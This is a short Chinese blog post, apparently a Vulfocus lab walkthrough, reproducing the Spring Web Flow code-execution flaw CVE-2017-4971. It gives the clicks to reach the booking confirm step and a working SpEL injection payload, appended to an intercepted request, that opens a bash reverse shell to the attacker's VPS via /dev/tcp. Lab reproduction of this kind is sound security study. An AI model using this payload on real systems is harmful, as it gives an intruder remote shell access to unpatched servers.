Vulfocus靶场 | spring 代码执行 (CVE-2017-4971)

漏洞描述

Spring Web Flow建立在Spring MVC之上,并允许实现Web应用程序的“流”

由于没有明确指定相关 model 的具体属性导致从表单可以提交恶意的表达式从而被执行,导致任意代码执行的漏洞

漏洞复现

访问页面点击左上角“login”

 

 

然后随便选一个用户密码登录

直接点击“find hotels”

随便选一个宾馆

 

 

 

 内容随便填,然后提交,confirm时使用Burp截断数据包

在请求包最后加上你VPS的ip和端口

 

 

&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/ip/port+0>%261")).start()=vulfocus

然后发包即可

 

 

 

posted @ 2022-08-20 22:40  mlxwl  阅读(288)  评论(0编辑  收藏  举报